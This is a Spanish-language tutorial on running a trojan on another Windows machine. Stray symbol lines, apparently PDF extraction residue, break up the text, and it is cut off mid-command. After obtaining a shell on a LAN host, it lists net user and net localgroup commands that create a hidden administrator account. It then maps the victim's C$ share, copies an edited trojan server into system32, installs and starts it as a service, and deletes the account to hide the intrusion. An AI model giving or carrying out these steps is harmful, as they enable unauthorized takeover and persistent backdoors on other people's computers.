Como ejecutar un troyano

* / 0 ! , 3

"" +

,

! "#$ %& ' !- ./ ) / 3 " 56% 4 "

()

111( ( & & / /

22 (

0

(

c:\kath 192.168.0.1 192.168.0.28 Esas IP`s privadas

varian según la red lan. No siempreson las mismas.

3 0 / c:\kath 10.10.20.1 10.10.20.255 y Como muestra la imagen, nos da Shell en la maquina 10.10.20.6

Bueno Tecleamos NET USER, para ver quien esta como administrador, si hayinvitados, etc. “acuerdate que ya estamos en la shell de 10.10.20.6” Ahora expliccare algunas pautas o comandos a tener en cuenta: • C:\WINNT\system32>net user test pwd /add -------Para crearnos unusuario(invitado) • C:\WINNT\system32>net localgroup administradores test /add ----Para ponerlo como Admin • C:\WINNT\system32>net localgroup administradores-----Para ver si estamos como Admin

Como vemos“test”(el usuario que hemos creado con password “pwd”), esta dentro de administrador Terminado este paso, procederemos a la infeccion de la pc, pero antes es necesario tener en cuenta que si la pc dela victima se reinicia, le aparecera un cartel de aviso que estamos conectado a su pc, pero esto solo pasa si reinicia, sino no aparecera ningun tipo de aviso. Bueno en otra consola de DoS, ponemosestas lineas para mapearlo en nuestro explorer como unidad X C:\>nbtstat -a 10.10.20.6 Para saber el nombre de maquina C:\>net use x: \10.10.20.6\C$ pwd /user:VPRADO\test Para maperlo en el explorer&

/

./

(

Nos vamos a su windows/system32 y copiamos nuestro server editado. En este caso mi server se llama loadqm.exe, nos desmapeamos de X(desconectar unidad) y regresamos a la consolade la shell de 10.10.20.6, y a ejecutarlo remotamente. C:\WINNT\system32>loadqm.exe –install C:\WINNT\system32>loadqm.exe C:\WINNT\system32>net start loadqm.exe Ahora para finalizar, Borramos lacuenta de usuario que creamos.

&

7

,

4

&

&

En la shell de 10.10.20.6, poniamos

C:\WINNT\system32>net share ----- Para ver que recursos tiene compartidos C:\WINNT\system32>net...